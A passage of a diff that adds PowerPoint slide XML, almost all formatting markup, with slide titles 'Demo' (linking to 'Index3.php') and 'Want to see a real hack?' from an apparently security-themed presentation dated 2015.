+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>Demo</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
+              <a:latin typeface="Constantia"/>
+              <a:cs typeface="Constantia"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Content Placeholder 2"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="457200" y="2547533"/>
+            <a:ext cx="8229600" cy="3361133"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="9525">
+            <a:noFill/>
+            <a:miter lim="800000"/>
+            <a:headEnd/>
+            <a:tailEnd/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
+            <a:prstTxWarp prst="textNoShape">
+              <a:avLst/>
+            </a:prstTxWarp>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr marL="0" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="457200" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="914400" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1371600" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="1600" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="1828800" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="1600" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2286000" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2743200" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3200400" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3657600" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Index3.php</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3796370955"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
+    <mc:Choice Requires="p14">
+      <p:transition p14:dur="100">
+        <p:cut/>
+      </p:transition>
+    </mc:Choice>
+    <mc:Fallback xmlns="">
+      <p:transition>
+        <p:cut/>
+      </p:transition>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Date Placeholder 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="dt" sz="half" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="6530996"/>
+            <a:ext cx="2133600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{945310C2-C0B2-5241-BEC0-6819B2B3C035}" type="datetime2">
+              <a:rPr lang="en-US" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:pPr/>
+              <a:t>Wednesday, May 06, 2015</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FFFFFF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Footer Placeholder 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="ftr" sz="quarter" idx="11"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3124200" y="6530996"/>
+            <a:ext cx="2895600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>www.qsoftvietnam.com</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6853962" y="6530996"/>
+            <a:ext cx="2133600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{FA84A37A-AFC2-4A01-80A1-FC20F2C0D5BB}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:pPr/>
+              <a:t>26</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FFFFFF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Title 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="125944" y="1084023"/>
+            <a:ext cx="8720218" cy="1143000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="9525">
+            <a:noFill/>
+            <a:miter lim="800000"/>
+            <a:headEnd/>
+            <a:tailEnd/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
+            <a:prstTxWarp prst="textNoShape">
+              <a:avLst/>
+            </a:prstTxWarp>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>Want to see a real hack?</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
+              <a:latin typeface="Constantia"/>
+              <a:cs typeface="Constantia"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Content Placeholder 2"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="457200" y="2547533"/>
+            <a:ext cx="8229600" cy="3361133"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="9525">
+            <a:noFill/>
+            <a:miter lim="800000"/>
+            <a:headEnd/>
+            <a:tailEnd/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
+            <a:prstTxWarp prst="textNoShape">
+              <a:avLst/>
+            </a:prstTxWarp>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr marL="0" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="457200" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="914400" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1371600" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="1600" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="1828800" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="1600" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2286000" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2743200" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3200400" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3657600" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
